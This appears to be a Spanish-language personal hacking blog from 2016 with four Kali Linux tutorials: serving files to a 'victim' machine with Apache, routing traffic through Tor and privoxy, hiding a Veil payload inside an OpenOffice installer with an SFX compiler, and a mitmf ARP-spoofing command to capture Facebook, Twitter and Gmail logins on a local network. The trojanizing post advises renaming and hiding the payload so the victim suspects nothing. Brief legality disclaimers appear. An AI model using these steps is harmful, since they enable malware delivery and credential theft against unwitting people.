viernes, 25 de marzo de 2016

Compartir archivos con apache

Muchos de los que nos dedicamos a esto (en mi caso, por hobby), hemos utilizado apache como servidor y así, pasar un archivo al ordenador víctima, descargándolo en la misma.

Desde Kali Linux 2, esto no es posible directamente, hay que cambiar algunas cosillas.

nos vamos a /etc/apache2/sites-enabled

editamos 000-default.conf

Cambiamos DocumentRoot a /var/www/



service apache2 start

Y ya podemos descargar lo que queramos en el equipo víctima:



viernes, 18 de marzo de 2016

Intalando TOR

Instalación de tor:

apt-get install tor



Le decimos que si



Vamos a instalar privoxy, para que también nuestras búsquedas DNS también estén ocultas.

apt-get install privoxy



Respondemos que sí.



Editamos /etc/proxychains.conf

añadimos al final del archivo lo siguiente



socks4<tab>127.0.0.1<tab>9050
socks5<tab>127.0.0.1<tab>9050
socks5t<tab>127.0.0.1<tab>9050
 http<tab>127.0.0.1<tab>8118

Guardamos.

Abrimos ahora el fichero /etc/privoxy/config

Buscamos listen-address



Descomentamos 127.0.0.1:8118



Vamos al final del archivo



Añadimos

forward-socks5t<tab>/<tab>127.0.0.1:9050<tab>.
forward-socks4a<tab>/<tab>127.0.0.1:9050<tab>.
forward-socks5<tab>/<tab>127.0.0.1:9050<tab>.

Ojo, hay que poner el punto final.
Guardamos.

Para iniciar haremos:
service tor start
service privoxy start

Y para terminar

service tor stop
service privoxy stop





viernes, 11 de marzo de 2016

Ocultar un payload en un archivo ejectuable

Descargamos SFX compiler y lo copiamos en la misma carpeta que el PAYLOAD y que el programa a troyanizar, en este caso, Open Office



Instalamos SFX compiler, poniendo

wine sfx-compiler-2.03.exe











buscamos el archivo ejecutable de SFX compiler y lo ejecutamos (estará en los subdirectorios de la carpeta /root/.wine) con wine.



Pulsamos “Add” y añadimos los archivos.



Vamos a opciones



En File to run after extration (main file) elegimos el payload y en File to run before running main file ponemos el ejecutable víctima (Open Office en mi caso). Y dejamos marcada la opción “Do not promp use for folder selection”



Damos a Create y seleccionamos nombre del nuevo ejecutable y destino.






Lo que hemos echo ha sido crear un archivo comprimido y autoextraíble, metiendo en él el programa de instalación de Open Office y el payload creado con veil, manugomez1977.exe.

La víctima, al abrirlo, sin darse cuenta descomprime en la carpeta Extrated (aunque mejor meterla en una carpeta que sea difícil de localizar, o incluso en la carpeta temporal de windows) y cambiar el nombre manugomez1977.exe por otro parecido al ejecutable, para que la víctima no sospeche nada.

Recordad, hay que seguir la legalidad.
 
Un saludo a todos y happy hacking ;-)

viernes, 4 de marzo de 2016

Hackeando Facebook, Twitter, gmail, etc. en red local

En primer lugar ponemos:

echo 1 > /proc/sys/net/ipv4/ip_forward



utilizaremos mitmf, si no lo tenéis instalado, ya sabéis: apt-get install mitmf.

Mitmf nos va ha realizar un ataque de Man In The Middle y lo hará pasar por un proxy para transformar las peticiones https para poder capturar el tráfico.

Ponemos

mitmf -i (interfaz) --arp --spoof --target (ip objetivo) --gateway (ip router)




Si no sale la pantalla anterior, y os sale que hay un error, pulsar CTRL+C y volvéis a ejecutar.



Para parar el envenenamiento, pulsaremos CTRL+C

 
Realizad esta práctica dentro de la legalidad.